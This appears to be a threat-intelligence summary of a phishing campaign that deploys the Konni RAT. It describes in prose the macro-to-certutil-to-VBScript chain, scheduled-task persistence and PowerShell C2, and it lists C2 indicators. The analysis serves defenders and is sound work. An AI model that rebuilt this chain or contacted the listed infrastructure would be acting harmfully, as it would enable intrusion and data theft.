Threat Research

Meeting the “Ministrer” | Fortinet Blog

Securonix

Fortinet’s FortiGuard Labs uncovered a Russian-language phishing email designed to deploy the Konni RAT linked to APT37, with persistence and C2 communications. The attack uses a Donbass.zip attachment containing decoy PowerPoint files and a malicious macro chain to drop and execute VBScript on Windows systems.
#Konni #APT37

Keypoints

  • The phishing email targets Windows users and is tied to Konni, a remote administration tool associated with APT37 and DPRK alignment.
  • The email spoofs the Consulate General of Russia in Shenyang and uses a thread-like subject to appear credible.
  • The Zip attachment named “Donbass.zip” contains a decoy PowerPoint and a malicious add-in file (Donbass.ppam).
  • The Donbass.ppam macro uses a command prompt to drop base64 data into oup.dat and then decodes it to oup.vbs via Certutil.
  • oup.vbs creates a scheduled task “Office Updatev2.2” to ensure persistence and executes a base64 PowerShell command to reach a C2 server.
  • The PowerShell stage attempts to reveal environment information and connect to a C2 domain/IP (gg1593.c1.biz / 185.176.43.106), though the C2 was not responsive at analysis time.
  • Fortinet protections include VBA/Agent.AIF!tr detections, Web Filtering blocks, and phishing-awareness trainings like FortiPhish and NSE modules.

MITRE Techniques

  • [T1566.001] Phishing – Attachment – The email carries a Donbass.zip attachment to lure the user into deploying malware. “Attached to the email is a Zip archive, “Donbass.zip”.”
  • [T1059.003] Command and Scripting Interpreter – Command Prompt – The macro uses a command prompt to deposit base64 data. “Using a command prompt, it then deposits a large block of base 64-encoded text into a file called “oup.dat”.”
  • [T1132.001] Data Encoding – Base64 decoding via Certutil – Base64 data is decoded to oup.vbs using Certutil. “the encoded text within “oup.dat” is then decoded to “oup.vbs”.”
  • [T1059.001] PowerShell – PowerShell command execution – A base64-encoded PowerShell command is executed. “The PowerShell command attempts to provide some environment information (e.g., machine name) and connect to a URL at gg1593[.]c1[.]biz.”
  • [T1053.005] Scheduled Task – Persistence through scheduled task – A task named “Office Updatev2.2” runs every 5 minutes. “create a scheduled task called “Office Updatev2.2”. The purpose of this task is to continually run “oup.vbs” once every 5 minutes.”
  • [T1071.001] Web Protocols – C2 over HTTP – The PowerShell stage connects to a C2 URL. “connect to a URL at gg1593[.]c1[.]biz.”
  • [T1082] System Information Discovery – Environment information gathering – The PowerShell step collects info like machine name. “some environment information (e.g., machine name)…”

Indicators of Compromise

  • [Domain] C2 domain – gg1593.c1.biz
  • [IP] C2 IP – 185.176.43.106
  • [File name] Donbass.zip, Donbass.ppam – infection-related archive and add-in used in the phishing chain

Read more: https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint